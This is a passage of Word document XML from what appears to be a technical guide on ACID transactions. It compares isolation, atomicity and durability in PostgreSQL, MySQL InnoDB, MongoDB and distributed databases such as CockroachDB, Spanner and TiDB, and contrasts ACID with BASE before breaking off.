    <w:p w14:paraId="731A150C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. ACID in Specific Database Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6592E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8223C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506408C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Atomicity:   WAL (write-ahead log) + undo via MVCC (old versions preserved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE71227" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Consistency: Constraints, triggers, rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB02D18" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Isolation:   MVCC-based. Default: Read Committed. Supports Serializable (SSI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BEE422" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Durability:  WAL with fsync. synchronous_commit controls level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42D447" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="67D67F28" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Key behaviors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD919CB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Repeatable Read uses snapshot isolation (prevents phantoms too).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF48AD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Serializable uses SSI (optimistic, aborts on conflict detection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653FD12" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - MVCC means readers never block writers (high concurrency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F208EC8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - VACUUM needed to clean old row versions (MVCC garbage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F125037" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.2 MySQL (InnoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C4BB6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311572B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Atomicity:   Redo log (WAL equivalent) + undo log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49BC20" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Consistency: Constraints, triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2F79C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Isolation:   MVCC + locking. Default: Repeatable Read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A2004D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Durability:  Redo log with innodb_flush_log_at_trx_commit (0, 1, 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F261A4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="0A9897FD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Key behaviors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B7C5C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Repeatable Read: MVCC snapshot for reads, next-key locks for writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE98C9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Phantoms partially prevented by gap locks (next-key locking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2815D0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Serializable mode: uses shared locks on all reads (readers block writers!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD98847" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - innodb_flush_log_at_trx_commit=1: fsync every commit (safe, slower).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E0314" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - innodb_flush_log_at_trx_commit=2: flush to OS cache per commit (faster, less safe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8F6B3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - innodb_flush_log_at_trx_commit=0: flush every second (fastest, up to 1s data loss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D021A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C66774" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B95FA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Single-document atomicity: Always (single document operations are atomic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20353A37" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Multi-document transactions: Supported since 4.0 (2018).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350711C5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="6B4183F9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Isolation: Snapshot isolation for multi-document transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70E200" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Durability: Journal (WAL equivalent). writeConcern controls level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B09DE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  writeConcern: { w: "majority", j: true }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD66AC2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  → Write acknowledged by majority of replica set, journaled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECA5789" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="138D126A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Key behaviors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260838B6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Single-document operations are always atomic (no transaction needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24746D8B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Multi-document transactions have overhead (use sparingly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B35A7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - WiredTiger storage engine provides MVCC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A661E6F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Reads within transaction see a consistent snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA6F34" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 Distributed Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778E06E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13469AD4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>CockroachDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE79B4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Serializable isolation by DEFAULT (strongest level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7FBB31" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Uses Raft consensus per range (distributed atomicity + durability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D279C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - MVCC with timestamp ordering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56255939" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Distributed transactions via parallel commits optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCB978" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="3BC421A9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Google Spanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C2DFA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - External consistency (strongest: real-time ordering across globe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8CCB00" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - TrueTime + Paxos consensus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354B084" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Serializability guaranteed globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430498FC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - 7ms+ commit latency (TrueTime wait).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226DDE01" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="6BEA99C3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>TiDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219C008" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Snapshot isolation (Repeatable Read) by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8C5DA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Optimistic and pessimistic transaction modes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB18F6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Raft-based replication (distributed durability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F943E7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Percolator-based distributed transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEA0AD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="15016E02">
          <v:rect id="_x0000_i6701" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656E9AF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. ACID vs. BASE — The Spectrum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4FBA6F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B028B1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>ACID (Traditional RDBMS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5115C526" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Strong consistency, transactions, correctness above all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B391B25" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D33A33" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>BASE (NoSQL / Distributed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C959D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Basically Available: system is always available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B46EC6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Soft state: state may change over time (even without input).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A4106" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Eventually consistent: will converge to consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D6BA2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="2BC6F846" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2F67C8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">│ ACID </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve"> BASE    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD08AC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D327DFB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ Strong consistency        Eventual consistency               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517FBAC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ Pessimistic (locks/abort) Optimistic (merge/resolve)         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441EC821" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ Vertical scaling          Horizontal scaling                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF0813D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ Lower availability        Higher availability                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049AE68B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ Higher latency            Lower latency                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B0CD5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027812E9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ PostgreSQL, MySQL         Cassandra, DynamoDB                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537A2BB7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ Spanner, CockroachDB     MongoDB (default), Redis           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBF8BB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│ (distributed ACID)        (BASE with optional ACID)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1E1F8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36BE3D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="652CE726" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Modern systems blur the line:</w:t>
      </w:r>
    </w:p>
